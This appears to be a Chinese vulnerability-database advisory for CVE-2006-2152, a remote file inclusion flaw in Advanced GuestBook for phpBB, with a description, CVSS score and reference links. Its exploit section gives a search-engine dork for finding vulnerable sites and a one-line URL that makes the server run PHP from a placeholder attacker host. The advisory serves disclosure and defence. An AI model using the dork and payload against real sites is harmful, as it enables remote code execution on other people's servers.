Advanced GuestBook addentry.php 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110163 漏洞类型 输入验证
发布时间 2006-04-28 更新时间 2006-05-03
CVE编号 CVE-2006-2152 CNNVD-ID CNNVD-200605-040
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1723
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-040
|漏洞详情
AdvancedGuestBook是一款流行的PHP论坛程序phpBB的组件。AdvancedGuestBook实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。AdvancedGuestBook的addentry.php脚本没有对phpbb_root_path变量值的内容做充分的过滤就在脚本中引用,导致攻击者可以使之包含远程机器上的PHP脚本进行执行。
|漏洞EXP
Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
Credits: [Oo]

Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?

# milw0rm.com [2006-04-28]
|参考资料

来源:VUPEN
名称:ADV-2006-1600
链接:http://www.frsirt.com/english/advisories/2006/1600
来源:SECUNIA
名称:19905
链接:http://secunia.com/advisories/19905
来源:MILW0RM
名称:1725
链接:http://milw0rm.com/exploits/1725
来源:XF
名称:adv-guestbook-addentry-file-include(26217)
链接:http://xforce.iss.net/xforce/xfdb/26217
来源:BID
名称:17745
链接:http://www.securityfocus.com/bid/17745